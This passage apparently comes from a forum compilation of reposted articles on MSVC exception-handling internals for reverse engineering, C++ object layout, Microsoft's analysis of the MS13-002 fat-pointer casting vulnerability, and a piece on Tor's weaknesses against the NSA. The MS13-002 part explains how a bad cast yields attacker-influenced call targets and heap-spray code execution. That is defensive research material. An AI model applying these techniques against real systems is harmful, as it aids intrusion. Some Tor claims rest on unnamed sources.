    long (*FilterFunc)();
    union {
        void (*HandlerAddress)();
        void (*FinallyFunc)();
    };
};

GSCookieOffset = -2 means that the GS cookie is not used. The EH cookie is always present. Offsets are ebp-relative. The check is done the following way:

(ebp+CookieXOROffset) ^ [ebp+CookieOffset] == _security_cookie

The pointer to the scopetable in the stack is XORed with _security_cookie too. Also, in SEH4 the outermost scope level is -2, not -1 as in SEH3.

C++ Exception Model Implementation

When C++ exception handling (try/catch) or unwindable objects are present in the function, things get pretty complex.

C++ EH Stack Layout

The EH handler is different for each function (unlike the SEH case) and usually looks like this (VC7+):

mov eax, OFFSET __ehfuncinfo
jmp ___CxxFrameHandler

__ehfuncinfo is a structure of type FuncInfo which fully describes all try/catch blocks and unwindable objects in the function.

struct FuncInfo {
    // compiler version.
    // 0x19930520: up to VC6, 0x19930521: VC7.x (2002-2003), 0x19930522: VC8 (2005)
    DWORD magicNumber;
    // number of entries in unwind table
    int maxState;
    // table of unwind destructors
    UnwindMapEntry* pUnwindMap;
    // number of try blocks in the function
    DWORD nTryBlocks;
    // mapping of catch blocks to try blocks
    TryBlockMapEntry* pTryBlockMap;
    // not used on x86
    DWORD nIPMapEntries;
    // not used on x86
    void* pIPtoStateMap;
    // VC7+ only, expected exceptions list (function "throw" specifier)
    ESTypeList* pESTypeList;
    // VC8+ only, bit 0 set if function was compiled with /EHs
    int EHFlags;
};

The unwind map is similar to the SEH scopetable, only without filter functions:

struct UnwindMapEntry {
    int toState;      // target state
    void (*action)(); // action to perform (unwind funclet address)
};

Try block descriptor. Describes a try{} block with associated catches.

struct TryBlockMapEntry {
    int tryLow;
    int tryHigh;   // this try {} covers states ranging from tryLow to tryHigh
    int catchHigh; // highest state inside catch handlers of this try
    int nCatches;  // number of catch handlers
    HandlerType* pHandlerArray; // catch handlers table
};

Catch block descriptor. Describes a single catch() of a try block.

struct HandlerType {
    // 0x01: const, 0x02: volatile, 0x08: reference
    DWORD adjectives;
    // RTTI descriptor of the exception type. 0=any (ellipsis)
    TypeDescriptor* pType;
    // ebp-based offset of the exception object in the function stack.
    // 0 = no object (catch by type)
    int dispCatchObj;
    // address of the catch handler code.
    // returns address where to continue execution (i.e. code after the try block)
    void* addressOfHandler;
};

List of expected exceptions (implemented but not enabled in MSVC by default, use /d1ESrt to enable).

struct ESTypeList {
    // number of entries in the list
    int nCount;
    // list of exceptions; it seems only the pType field in HandlerType is used
    HandlerType* pTypeArray;
};

RTTI type descriptor. Describes a single C++ type.
Used here to match the thrown exception type with the catch type.

struct TypeDescriptor {
    // vtable of type_info class
    const void * pVFTable;
    // used to keep the demangled name returned by type_info::name()
    void* spare;
    // mangled type name, e.g. ".H" = "int", ".?AUA@@" = "struct A", ".?AVA@@" = "class A"
    char name[0];
};

Unlike SEH, each try block doesn't have a single associated state value. The compiler changes the state value not only on entering/leaving a try block, but also for each constructed/destroyed object. That way it's possible to know which objects need unwinding when an exception happens. You can still recover try block boundaries by inspecting the associated state range and the addresses returned by catch handlers (see Appendix 2).

Throwing C++ Exceptions

throw statements are converted into calls of _CxxThrowException(), which actually raises a Win32 (SEH) exception with the code 0xE06D7363 ('msc'|0xE0000000). The custom parameters of the Win32 exception include pointers to the exception object and its ThrowInfo structure, using which the exception handler can match the thrown exception type against the types expected by catch handlers.

struct ThrowInfo {
    // 0x01: const, 0x02: volatile
    DWORD attributes;
    // exception destructor
    void (*pmfnUnwind)();
    // forward compatibility handler
    int (*pForwardCompat)();
    // list of types that can catch this exception.
    // i.e. the actual type and all its ancestors.
    CatchableTypeArray* pCatchableTypeArray;
};

struct CatchableTypeArray {
    // number of entries in the following array
    int nCatchableTypes;
    CatchableType* arrayOfCatchableTypes[0];
};

Describes a type that can catch this exception.
struct CatchableType {
    // 0x01: simple type (can be copied by memmove), 0x02: can be caught by reference only, 0x04: has virtual bases
    DWORD properties;
    // see above
    TypeDescriptor* pType;
    // how to cast the thrown object to this type
    PMD thisDisplacement;
    // object size
    int sizeOrOffset;
    // copy constructor address
    void (*copyFunction)();
};

// Pointer-to-member descriptor.
struct PMD {
    // member offset
    int mdisp;
    // offset of the vbtable (-1 if not a virtual base)
    int pdisp;
    // offset to the displacement value inside the vbtable
    int vdisp;
};

We'll delve more into this in the next article.

Prologs and Epilogs

Instead of emitting the code for setting up the stack frame in the function body, the compiler might choose to call specific prolog and epilog functions instead. There are several variants, each used for a specific function type:

Name                                      | Type   | EH Cookie | GS Cookie | Catch Handlers
_SEH_prolog/_SEH_epilog                   | SEH3   | -         | -         |
_SEH_prolog4/_SEH_epilog4                 | SEH4   | +         | -         |
_SEH_prolog4_GS/_SEH_epilog4_GS           | SEH4   | +         | +         |
_EH_prolog                                | C++ EH | -         | -         | +/-
_EH_prolog3/_EH_epilog3                   | C++ EH | +         | -         | -
_EH_prolog3_catch/_EH_epilog3             | C++ EH | +         | -         | +
_EH_prolog3_GS/_EH_epilog3_GS             | C++ EH | +         | +         | -
_EH_prolog3_catch_GS/_EH_epilog3_catch_GS | C++ EH | +         | +         | +

SEH2

Apparently was used by MSVC 1.XX (exported by crtdll.dll). Encountered in some old NT programs.

...
Saved edi
Saved esi
Saved ebx
Next SEH frame
Current SEH handler (__except_handler2)
Pointer to the scopetable
Try level
Saved ebp (of this function)
Exception pointers
Local variables
Saved ESP
Local variables
Callee EBP
Return address
Function arguments
...

Appendix I: Sample SEH Program

Let's consider the following sample disassembly.

func1 proc near

_excCode = dword ptr -28h
buf = byte ptr -24h
_saved_esp = dword ptr -18h
_exception_info = dword ptr -14h
_next = dword ptr -10h
_handler = dword ptr -0Ch
_scopetable = dword ptr -8
_trylevel = dword ptr -4
str = dword ptr 8

    push ebp
    mov ebp, esp
    push -1
    push offset _func1_scopetable
    push offset _except_handler3
    mov eax, large fs:0
    push eax
    mov large fs:0, esp
    add esp, -18h
    push ebx
    push esi
    push edi
; --- end of prolog ---
    mov [ebp+_trylevel], 0   ; trylevel -1 -> 0: beginning of try block 0
    mov [ebp+_trylevel], 1   ; trylevel 0 -> 1: beginning of try block 1
    mov large dword ptr ds:123, 456
    mov [ebp+_trylevel], 0   ; trylevel 1 -> 0: end of try block 1
    jmp short _endoftry1

_func1_filter1: ; __except() filter of try block 1
    mov ecx, [ebp+_exception_info]
    mov edx, [ecx+EXCEPTION_POINTERS.ExceptionRecord]
    mov eax, [edx+EXCEPTION_RECORD.ExceptionCode]
    mov [ebp+_excCode], eax
    mov ecx, [ebp+_excCode]
    xor eax, eax
    cmp ecx, EXCEPTION_ACCESS_VIOLATION
    setz al
    retn

_func1_handler1: ; beginning of handler for try block 1
    mov esp, [ebp+_saved_esp]
    push offset aAccessViolatio ; "Access violation"
    call _printf
    add esp, 4
    mov [ebp+_trylevel], 0   ; trylevel 1 -> 0: end
of try block 1

_endoftry1:
    mov edx, [ebp+str]
    push edx
    lea eax, [ebp+buf]
    push eax
    call _strcpy
    add esp, 8
    mov [ebp+_trylevel], -1  ; trylevel 0 -> -1: end of try block 0
    call _func1_handler0     ; execute __finally of try block 0
    jmp short _endoftry0

_func1_handler0: ; __finally handler of try block 0
    push offset aInFinally ; "in finally"
    call _puts
    add esp, 4
    retn

_endoftry0:
; --- epilog ---
    mov ecx, [ebp+_next]
    mov large fs:0, ecx
    pop edi
    pop esi
    pop ebx
    mov esp, ebp
    pop ebp
    retn
func1 endp

_func1_scopetable
; try block 0
    dd -1                        ; EnclosingLevel
    dd 0                         ; FilterFunc
    dd offset _func1_handler0    ; HandlerFunc
; try block 1
    dd 0                         ; EnclosingLevel
    dd offset _func1_filter1     ; FilterFunc
    dd offset _func1_handler1    ; HandlerFunc

Try block 0 has no filter, therefore its handler is a __finally{} block. EnclosingLevel of try block 1 is 0, so it's placed inside try block 0. Considering this, we can try to reconstruct the function structure:

void func1 (char* str)
{
  char buf[12];
  __try // try block 0
  {
    __try // try block 1
    {
      *(int*)123 = 456;
    }
    __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION)
    {
      printf("Access violation");
    }
    strcpy(buf, str);
  }
  __finally
  {
    puts("in finally");
  }
}

Appendix II: Sample Program with C++ Exceptions

func1 proc near

_a1 = dword ptr -24h
_exc = dword ptr -20h
e = dword ptr -1Ch
a2 = dword ptr -18h
a1 = dword ptr -14h
_saved_esp = dword ptr -10h
_next = dword ptr -0Ch
_handler = dword ptr -8
_state = dword ptr -4

    push ebp
    mov ebp, esp
    push 0FFFFFFFFh
    push offset func1_ehhandler
    mov eax, large fs:0
    push eax
    mov large fs:0, esp
    push ecx
    sub esp, 14h
    push ebx
    push esi
    push edi
    mov [ebp+_saved_esp], esp
; --- end of prolog ---
    lea ecx, [ebp+a1]
    call A::A(void)
    mov [ebp+_state], 0          ; state -1 -> 0: a1 constructed
    mov [ebp+a1], 1              ; a1.m1 = 1
    mov byte ptr [ebp+_state], 1 ; state 0 -> 1: try {
    lea ecx, [ebp+a2]
    call A::A(void)
    mov [ebp+_a1], eax
    mov byte ptr [ebp+_state], 2 ; state 2: a2 constructed
    mov [ebp+a2], 2              ; a2.m1 = 2
    mov eax, [ebp+a1]
    cmp eax, [ebp+a2]            ; a1.m1 == a2.m1?
    jnz short loc_40109F
    mov [ebp+_exc], offset aAbc  ; _exc = "abc"
    push offset __TI1?PAD        ; char *
    lea ecx, [ebp+_exc]
    push ecx
    call _CxxThrowException      ; throw "abc";

loc_40109F:
    mov byte ptr [ebp+_state], 1 ; state 2 -> 1: destruct a2
    lea ecx, [ebp+a2]
    call A::~A(void)
    jmp short func1_try0end

; catch (char * e)
func1_try0handler_pchar:
    mov edx, [ebp+e]
    push edx
    push offset aCaughtS ; "Caught %s\n"
    call ds:printf
    add esp, 8
    mov eax, offset func1_try0end
    retn

; catch (...)
func1_try0handler_ellipsis:
    push offset aCaught___ ; "Caught ...\n"
    call ds:printf
    add esp, 4
    mov eax, offset func1_try0end
    retn

func1_try0end:
    mov [ebp+_state], 0      ; state 1 -> 0: }//try
    push offset aAfterTry    ; "after try\n"
    call ds:printf
    add esp, 4
    mov [ebp+_state], -1     ; state 0 -> -1: destruct a1
    lea ecx, [ebp+a1]
    call A::~A(void)
; --- epilog ---
    mov ecx, [ebp+_next]
    mov large fs:0, ecx
    pop edi
    pop esi
    pop ebx
    mov esp, ebp
    pop ebp
    retn
func1 endp

func1_ehhandler proc near
    mov eax, offset func1_funcinfo
    jmp __CxxFrameHandler
func1_ehhandler endp

func1_funcinfo
    dd 19930520h                    ; magicNumber
    dd 4                            ; maxState
    dd offset func1_unwindmap       ; pUnwindMap
    dd 1                            ; nTryBlocks
    dd offset func1_trymap          ; pTryBlockMap
    dd 0                            ; nIPMapEntries
    dd 0                            ; pIPtoStateMap
    dd 0                            ; pESTypeList

func1_unwindmap
    dd -1                           ; toState
    dd offset func1_unwind_1tobase  ; action
    dd 0                            ; toState
    dd 0                            ; action
    dd 1                            ; toState
    dd offset func1_unwind_2to1     ; action
    dd 0                            ; toState
    dd 0                            ; action

func1_trymap
    dd 1                            ; tryLow
    dd 2                            ; tryHigh
    dd 3                            ; catchHigh
    dd 2                            ; nCatches
    dd offset func1_tryhandlers_0   ; pHandlerArray
    dd 0

func1_tryhandlers_0
    dd 0                                      ; adjectives
    dd offset char * `RTTI Type Descriptor'   ; pType
    dd -1Ch                                   ; dispCatchObj
    dd offset func1_try0handler_pchar         ; addressOfHandler
    dd 0                                      ; adjectives
    dd 0                                      ; pType
    dd 0                                      ; dispCatchObj
    dd offset func1_try0handler_ellipsis      ; addressOfHandler

func1_unwind_1tobase proc near
a1 = byte ptr -14h
    lea ecx, [ebp+a1]
    call A::~A(void)
    retn
func1_unwind_1tobase endp

func1_unwind_2to1 proc near
a2 = byte ptr -18h
    lea ecx, [ebp+a2]
    call A::~A(void)
    retn
func1_unwind_2to1 endp

Let's see what we can find out here. The maxState field in the FuncInfo structure is 4, which means we have four entries in the unwind map, from 0 to 3. Examining the map, we see that the following actions are executed during unwinding:

state 3 -> state 0 (no action)
state 2 -> state 1 (destruct a2)
state 1 -> state 0 (no action)
state 0 -> state -1 (destruct a1)

Checking the try map, we can infer that states 1 and 2 correspond to the try block body and state 3 to the catch block bodies. Thus, a change from state 0 to state 1 denotes the beginning of the try block, and a change from 1 to 0 its end. From the function code we can also see that -1 -> 0 is the construction of a1, and 1 -> 2 is the construction of a2. So the state diagram looks like this:

Where did the arrow 1->3 come from? We cannot see it in the function code or the FuncInfo structure, since it's done by the exception handler. If an exception happens inside the try block, the exception handler first unwinds the stack to the tryLow value (1 in our case) and then sets the state value to tryHigh+1 (2+1=3) before calling the catch handler.

The try block has two catch handlers. The first one has a catch type (char*) and gets the exception object on the stack (-1Ch = e). The second one has no type (i.e. an ellipsis catch). Both handlers return the address where to resume execution, i.e. the position just after the try block. Now we can recover the function code:

void func1 ()
{
  A a1;
  a1.m1 = 1;
  try
  {
    A a2;
    a2.m1 = 2;
    if (a1.m1 == a2.m1)
      throw "abc";
  }
  catch(char* e)
  {
    printf("Caught %s\n", e);
  }
  catch(...)
  {
    printf("Caught ...\n");
  }
  printf("after try\n");
}

Appendix III: IDC Helper Scripts

I wrote an IDC script to help with the reversing of MSVC programs. It scans the whole program for typical SEH/EH code sequences and comments all related structures and fields. Commented are stack variables, exception handlers, exception types and more.
It also tries to fix function boundaries that are sometimes incorrectly determined by IDA. You can download it from MS SEH/EH Helper.

Links and References

[1] Matt Pietrek. A Crash Course on the Depths of Win32 Structured Exception Handling. MSJ, January 1997. Still THE definitive guide on the implementation of SEH in Win32.
[2] Brandon Bray. Security Improvements to the Whidbey Compiler. Visual C++ Internals and Practices, MSDN Blogs. Short description of the changes in the stack layout for cookie checks.
[3] Chris Brumme. The Exception Model. cbrumme's WebLog, MSDN Blogs. Mostly about .NET exceptions, but still contains a good deal of information about SEH and C++ exceptions.
[4] Vishal Kochhar. How a C++ compiler implements exception handling. CodeProject. An overview of the C++ exceptions implementation.
[5] Calling Standard for Alpha Systems. Chapter 5: Event Processing. http://www.cs.arizona.edu/computer.help/policy/DIGITAL_unix/AA-PY8AC-TET1_html/callCH5.html Win32 takes a lot from the way Alpha handles exceptions, and this manual has a very detailed description of how it happens.

Structure definitions and flag values were also recovered from the following sources:

VC8 CRT debug information (many structure definitions)
VC8 assembly output (/FAs)
VC8 WinCE CRT source

Sursa: OpenRCE
11. [h=3]C++: Under the Hood[/h]

This is an article written by Jan Gray. It is quite old, but most of the contents still apply today. The original article on MSDN can no longer be found. Here is the pdf version on OpenRCE: http://www.openrce.org/articles/files/jangrayhood.pdf.

Overview:

How are classes laid out?
How are data members accessed?
How are member functions called?
What is an adjuster thunk?
What are the costs:
- of single, multiple, and virtual inheritance?
- of virtual functions and virtual function calls?
- of casts to bases, to virtual bases?
- of exception handling?

Sursa: C++: Under the Hood - Van's House - Site Home - MSDN Blogs
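As a quick taste of the first questions in that list, here is a minimal sketch (my own example, not from Gray's article) showing the observable difference between a call dispatched through the vtable and one resolved statically:

```cpp
#include <cassert>

struct Base {
    virtual int id() const { return 1; }   // dispatched through the vtable
    int plain() const { return 10; }       // resolved at compile time
    virtual ~Base() {}
};

struct Derived : Base {
    int id() const override { return 2; }  // replaces Base's vtable slot
};

// Called through a Base*, id() uses the object's dynamic type,
// while plain() uses the pointer's static type.
int virtual_call(const Base* p) { return p->id(); }
int static_call(const Base* p)  { return p->plain(); }

int demo_virtual() { Derived d; return virtual_call(&d); }
int demo_static()  { Derived d; return static_call(&d); }
```

Calling demo_virtual() yields Derived's answer even though the call site only sees a Base*; that indirection through the vtable is exactly the per-call cost the article quantifies.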
12. The story of MS13-002: How incorrectly casting fat pointers can make your code explode

swiat 6 Aug 2013 9:40 PM

C++ supports developers in object-oriented programming and removes from the developer the responsibility of dealing with many object-oriented programming (OOP) paradigm problems. But these problems do not magically disappear. Rather, it is the compiler that aims to provide a solution to many of the complexities that arise from C++ objects, virtual methods, inheritance etc. At its best the solution is almost transparent for developers. But beware of assuming or relying on 'under-the-hood' behavior. This is what I want to share in this post - some aspects of how compilers deal with C++ objects, virtual methods, inheritance, etc. At the end I want to describe a real-world problem that I analyzed recently, which I called a "pointer casting vulnerability".

Pointers: C vs C++

C++ introduces classes supported by the C++ language standard, which is a big change. Compilers need to take care of many problems, e.g. constructors, destructors, separating fields, method calling etc. In C we are able to create a function pointer, so why shouldn't we be able to create a pointer-to-member-function in C++? What does it mean? If we have a class with an implementation of any method, from the C developer's point of view this is just a function declared inside the object. C++ should allow us to create a pointer to exactly this method. It is called a pointer-to-member-function. How can you create one? It is more complex than a function pointer in C. Let's see an example:

class Whatever {
public:
    int func(int p_test) {
        printf("I'm method \"func()\"!\n");
        return 0;
    }
};

typedef int (Whatever::*func_ptr)(int);

func_ptr p_func = &Whatever::func;
Whatever *base = new Whatever();
int ret = (base->*p_func)(0x29a);

The definition of the function pointer is not much different compared to C. But the way to call the function through the pointer obviously is, because of the implied this pointer.
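The implied this is exactly what the ->* (or .*) syntax supplies. A runnable variant of the example above (standard C++, with a data member added for illustration) shows the same pointer-to-member-function bound to two different instances:

```cpp
#include <cassert>

// Variant of the article's Whatever class: base_ makes it visible
// which instance a given call was bound to.
class Whatever {
public:
    explicit Whatever(int base) : base_(base) {}
    int func(int p_test) { return base_ + p_test; }
private:
    int base_;
};

typedef int (Whatever::*func_ptr)(int);

// The object on the left of .* becomes `this` inside func().
int call_on(Whatever& obj, func_ptr f, int arg) {
    return (obj.*f)(arg);
}

int demo() {
    Whatever a(100), b(200);
    func_ptr p = &Whatever::func;      // one pointer...
    return call_on(a, p, 1) + call_on(b, p, 1);  // ...two this values
}
```

The same func_ptr value produces different results depending on the instance it is combined with, which is why an instance is mandatory at the call site.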
At this point some magic happens. Why do we need to have an instance of the class, and why are we using it as a base to call the pointer? The answer requires us to analyze what these "pointers" look like in memory. Normal pointers (known from the C language) have the size of a CPU word. If the CPU operates on 32-bit registers, a C-like pointer will be 32 bits long and will contain just a memory address. But the pointer-to-member-function C++ pointers mentioned above are sometimes also called "fat pointers". This name gives us a hint that they keep more information, not just a memory address. The fat pointer implementation is compiler-dependent, but their size is typically bigger than a function pointer. In Microsoft Visual C++ a pointer-to-member-function (fat pointer) can be 4, 8, 12 or even 16 bytes in size! Why so many options, and why is so much memory needed? It all depends on the nature of the class it's associated with.

Classes and inheritance

The nature of a "pointer to member function" is driven by the layout of the class whose member function we want to point to. There are some excellent references on the details of C++ object layout - see [1,2] for example. We give just one example class and associated layout: consider two unrelated classes that derive from the same base class:

class Tcpip {
public:
    short ip_id;
    virtual short chksum();
};

class Protocol_1 : virtual public Tcpip {
public:
    int value_1;
    virtual int proto_1_init();
};

class Protocol_2 : virtual public Tcpip {
public:
    int value_2;
    virtual int proto_2_init();
};

These two classes could be written by completely different developers or even companies. They don't need to be aware of each other. Now imagine that a third company wants to write a wrapper for these two protocols and export APIs that are independent of the specifics of either.
The new class could look like this:

class Proto_wrap : public Protocol_1, public Protocol_2 {
public:
    int value_3;
    int parse_something();
};

Note that having declared Protocol_1 and Protocol_2 with virtual inheritance means that there is a single version of ip_id (and chksum()) in the memory layout, and the statement pProtoWrap->chksum(); is unambiguous. The layout of a Proto_wrap object is:

(Without the virtual inheritance, each of Protocol_1 and Protocol_2 would have its own copy of the ip_id member, leading to ambiguity if we were to try something like: int a = pProto_wrap->ip_id )

Pointer-to-member-function (fat pointers)

Now that we have recalled some relevant background, we can return to the original problem. Why are pointers-to-member-functions bigger than a C-style function pointer? The Microsoft VC++ compiler can generate pointers-to-member-functions (fat pointers) that are 4, 8, 12 or even 16 bytes long [3,4]. Why are there so many options, and why do they need so much memory? Hopefully thinking about the object layout example above provides some hints...

If we create a pointer-to-member-function to a static function, it will be converted to a normal (C-like) pointer and will be 4 bytes long (on a 32-bit arch; otherwise, the CPU word size). Why? Because static functions have a fixed address that is unrelated to any specific object instance. In the single inheritance case, any member function can be referred to as an offset from a single 'this' pointer. In the multiple inheritance case, however, given a derived object (e.g. Proto_wrap) it is not the case that its 'this' pointer is valid for each base class. Rather, 'this' needs to be adjusted depending on which base class is being referred to. In this case the "fat pointer" will be 2 CPU words long:

| offset | "this" |

See [5] for a more detailed walkthrough.
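Both of these points can be checked with a small standalone sketch (the exact pointer sizes are compiler-dependent - MSVC uses the 4/8/12/16-byte scheme described above, while GCC/Clang use a fixed two-word representation - so the code only asserts the relative facts; method bodies are stubs I added so the diamond compiles):

```cpp
#include <cassert>
#include <cstddef>

// The article's diamond, with stub bodies for self-containment.
struct Tcpip {
    short ip_id;
    virtual short chksum() { return 0; }
    virtual ~Tcpip() {}
};
struct Protocol_1 : virtual public Tcpip {
    int value_1;
    virtual int proto_1_init() { return 1; }
};
struct Protocol_2 : virtual public Tcpip {
    int value_2;
    virtual int proto_2_init() { return 2; }
};
struct Proto_wrap : public Protocol_1, public Protocol_2 {
    int value_3;
};

// With virtual inheritance there is exactly one Tcpip subobject,
// so a write through one base path is visible through the other.
int shared_base_demo() {
    Proto_wrap w;
    static_cast<Protocol_1&>(w).ip_id = 42;
    return static_cast<Protocol_2&>(w).ip_id;
}

// A pointer-to-member-function is never smaller than a plain
// function pointer, whatever representation the compiler picks.
bool pmf_at_least_as_big() {
    using Pmf  = int (Proto_wrap::*)();
    using Func = int (*)();
    return sizeof(Pmf) >= sizeof(Func);
}
```

On a typical 64-bit GCC/Clang build, for instance, sizeof(Pmf) is 16 against 8 for the function pointer; the extra word holds the this-adjustment data discussed above.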
Additionally, if our object uses virtual inheritance (the layout example given in the previous section), then we need to know not only which of the vtables is relevant (Protocol_1's or Protocol_2's) but also the offset within it corresponding to the member function that we want to point to. In this case the pointer-to-member-function size will be 12 bytes (3 CPU words). This is not the end... You can also forward-declare an object, in which case the compiler has no idea about its memory layout and will allocate a 16-byte structure for the pointer-to-member-function, unless you specify the kind of inheritance associated with the object via special compiler switches/pragmas [3,4]. So now I will try to explain some interesting security-related behavior which I met during my work...

C++ pointer casting vulnerability

Let's analyze the following skeleton example. We have a base class, which is virtually inherited by two further classes: RealData holds some data; Manage can process specific types of data; 'BYTE *_ip' is used as the means to direct which of Manage's processing methods should be called.

class UnknownBase;

class RealData {
    friend Manage;
public:
    ...
    ULONG_PTR _lcurr; // some real data...
    int _flags;
    int _flags2;
    int _flags3;
};

class Manage : public virtual UnknownBase {
    friend class ProcessHelper;
public:
    BYTE * _ip;
    RealData * _curr;
    ...
};

class ProcessHelper : virtual UnknownBase {
public:
    typedef LONG_PTR (Manage::*ManageFunc)();
    struct DummyStruct {
        ManageFunc _executeMe; // pointer to member function!
    };
    ...
};

LONG_PTR Manage::frame() {
    LONG_PTR offset = (this->*(((ProcessHelper::DummyStruct *) _ip)->_executeMe))();
    return offset;
}

The key to this vulnerability is the rather convoluted cast in Manage::frame().
Note the types involved:

_ip is of type BYTE *
ProcessHelper::DummyStruct is a struct with a single pointer-to-member-function member of type ManageFunc

So the 'BYTE *' data is actually being cast (in a roundabout way, via a struct) to a ManageFunc pointer-to-member-function type, i.e. the instruction is really equivalent to:

LONG_PTR offset = ((ManageFunc)_ip)();

However, the compiler errors out on such a statement, flagging that 'BYTE *' and 'ManageFunc' are incompatible types (different sizes, in particular!) to be casting to and from. It appears here that the developer worked around the compiler error by introducing the 'struct DummyStruct' subterfuge: they assumed that under the hood the ManageFunc really was just a standard pointer, and were able to indirectly achieve the incorrect cast... C/C++ will always allow the persistent developer to eventually do the wrong thing.

Let's run through how this breaks in practice. We create the following instances:

Manage *temp_manage = new Manage;
RealData *temp_real_block = new RealData;

To illustrate the issue we might set up the 'flags' members as follows:

temp_real_block->_flags = 0x41414141;
temp_real_block->_flags2 = 0x41414141;
temp_real_block->_flags3 = 0x41414141;

And let's suppose the code does something like the following:

temp_manage->_ip = (BYTE *)&temp_real_block->_lcurr;
temp_manage->frame(); // does the (ManageFunc)_ip cast

This leads to a crash - after the cast to the DummyStruct structure containing the pointer-to-member-function, the code expects the fat-pointer memory layout associated with virtual inheritance, specifically expecting to find vbtable offset information at the 3rd CPU word: this value is taken and added to the whole pointer. In our case, _ip was pointing at _lcurr, and so we have the following adjacent data:

ULONG_PTR _lcurr;
int _flags;
int _flags2;
int _flags3;

So here, the arbitrary _flags data will be added to the memory address _lcurr in an attempt to form the address of the member function.
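A safe way to see the failure mode is to simulate the bogus address computation with plain structs (a sketch with hypothetical field layouts and values of my own choosing, not the real XML Core Services code, and no actual bad call is made):

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical model of the memory the buggy cast reinterprets:
// _ip pointed at _lcurr, so the fat-pointer machinery reads _lcurr
// as a code address and the adjacent _flags as adjustment data.
struct RealDataModel {
    uintptr_t lcurr;  // what _ip actually pointed at
    int32_t   flags;  // attacker-influenced adjacent data
};

// Simulates the broken arithmetic: the this-adjustment that the
// virtual-inheritance thunk would apply is read from adjacent memory
// and added to form the "member function address".
uintptr_t misinterpreted_target(const RealDataModel& r) {
    return r.lcurr + static_cast<uintptr_t>(static_cast<uint32_t>(r.flags));
}
```

With flags = 0x41414141 the computed call target is displaced by that entire arbitrary value; with flags = 2 (the value reachable in the real vulnerability) the target is the original address shifted by 2, landing inside attacker-sprayable memory.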
Note that RTTI (run-time type information) does not help here; the incorrect cast directly computes an incorrect memory address to call. The security consequences are potentially severe - full remote code execution (RCE). In such an incorrect 'standard pointer' to 'pointer-to-member-function' cast scenario, the data adjacent to the standard pointer will be used to calculate the address of the member function. If the attacker controls this, then by choosing suitable values here he can cause that address calculation to result in a value of his choosing, thus gaining control of execution.

In the real vulnerability we didn't have direct control over what was written to the "_flags" field. But we were able to execute a code path which set the "_flags" value to something non-zero - the number 2 (two). So we were able to set "_flags" to the value 2 and then execute the vulnerable code. Because the pointer was badly calculated (2 was added to it), the memory which was cast to the structure had bad values. Inside the structure were function pointers, and because they were shifted by 2 bytes, they pointed somewhere in memory which was always within the heap range. An attacker could spray the heap and thus control this. [6]

Summary

The higher-level a language, the more problems the associated compilers must solve. But the developer is ultimately responsible for writing correct code. Typically C/C++ compilers will ultimately allow you to cast to and from unrelated types (C pointers to pointers-to-member-functions, for example) and back again. Developers should avoid such illegal activity, take careful note of compiler warnings that occur when they break the rules, and be aware that if they persist they're on their own...

The Microsoft Visual C++ compiler detects the described situation and informs developers by printing an appropriate message:

error C2440: 'type cast' : cannot convert from 'BYTE *' to 'XXXyyyZZZ'.
There is no context in which this conversion is possible.

Btw. I would like to thank the following people for help with my work:

Tim Burrell (MSEC)
Greg Wroblewski (MSEC PENTEST)
Suha Can

Best regards,
Adam Zabrocki

References

[1] Reversing Microsoft Visual C++ Part II: Classes, Methods and RTTI
[2] C++: Under the Hood
[3] MSDN: Inheritance keywords
[4] MSDN: pointers-to-members pragma
[5] Pointers to member functions are very strange animals
[6] Microsoft Security Bulletin MS13-002 - Critical: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (2756145)

Sursa: The story of MS13-002: How incorrectly casting fat pointers can make your code explode - Security Research & Defense - Site Home - TechNet Blogs
13. Anonymity Smackdown: NSA vs. Tor

By Robert Graham

In recent news, Tor was hacked -- kinda. A guy hosting hidden services was arrested (with help from the FBI), and his servers were changed to deliver malware that exposed user IP addresses (with help from the NSA). This makes us ask: given all the recent revelations about the NSA, how secure is Tor at protecting our privacy and anonymity?

The answer is "not very". Tor has many weaknesses, especially the "Tor Browser Bundle". I'm going to describe some of them here.

The NSA runs lots of Tor nodes

The NSA hosts many nodes, anonymously, at high speed, spread throughout the world. These include ingress nodes, middle nodes, hidden services, and most especially, egress nodes. It's easy for them to create a front company, sign up for service, and host a node virtually anywhere. On any random Tor connection, there is a good chance that one of your hops will be through an NSA node.

Update: This is a controversial claim. I have some sources I cannot name. Also: I don't have the exact details as to what "many" means: 1%? 10%? 30%?

Tor uses only three hops

By default, Tor chooses three hops: the ingress point, the egress point, and only a single in-between node. If the NSA is able to control one or two of these nodes, you are still okay, because the third node will protect you. But if the NSA is able to control all three, then your connection is completely unmasked. This means that the NSA occasionally gets lucky, when somebody's connection hits three NSA nodes, allowing them to unmask the user.

Update: If we assume the NSA controls 1% of Tor nodes, that comes out to a one-in-a-million chance the NSA will unmask somebody on any random connection. If a million connections are created per day, that means the NSA unmasks one person per day.

Tor creates many new paths

Tor doesn't use a single static path through the network. Instead, it opens up a new path/tunnel every 15 minutes. Modern web services create constant background connections.
Thus, if you have your Outlook mail or Twitter open (and aren't using SSL), these will cause a new path to be created through the Tor network every 15 minutes, or 96 new paths every day, or about 3,000 new paths a month. That means over the long run, there's a good chance that the NSA will be able to catch one of those paths with a three-NSA-hop configuration, and completely unmask you.

Update: This is partly mitigated by the "guard" ingress node concept. You create only a single connection to the guard node, then fan out paths from there. But "mitigated" doesn't mean the same thing as "fixed".

Your egress traffic may be unencrypted

Tor encrypts your traffic on your end, but when it leaves the last node in the Tor network, it'll be whatever it was originally. If you are accessing websites without SSL, then this last hop will be unencrypted. It's usually easy to verify within web browsers whether they are using SSL, but most other apps have bugs that cause unencrypted sessions to be created.

Update: Also, some of your egress traffic is poorly encrypted, such as the 1024-bit keys without forward secrecy that Facebook uses.

Update: @addelindh points out that things like SSLstrip often work because people aren't paying attention and websites don't support things like HSTS; thus, even when you want SSL, it'll sometimes fail for you in the face of a hostile attacker. Somebody needs to set up an exit node, then SSLstrip it, to figure out how often that works.

Tor uses 1024-bit RSA/DH

Tor connections are only protected by 1024-bit RSA keys. The NSA can crack those keys. We don't know how easily they can do it. I'm guessing the NSA spent several years and a billion dollars to build ASICs. That means their internal accounting might charge $1 million per 1024-bit RSA key cracked. This means they won't try to crack keys for petty criminals, but they have the power to crack keys for serious targets. The NSA doesn't need to control all three servers along your route through Tor.
Instead, it can control two servers and crack the RSA key of the remaining connection.

Update: We know the NSA can crack 1024-bit keys, because it would cost only a few million dollars. What we don't know is how many such keys it can crack per day. The number could be less than one such key per day.

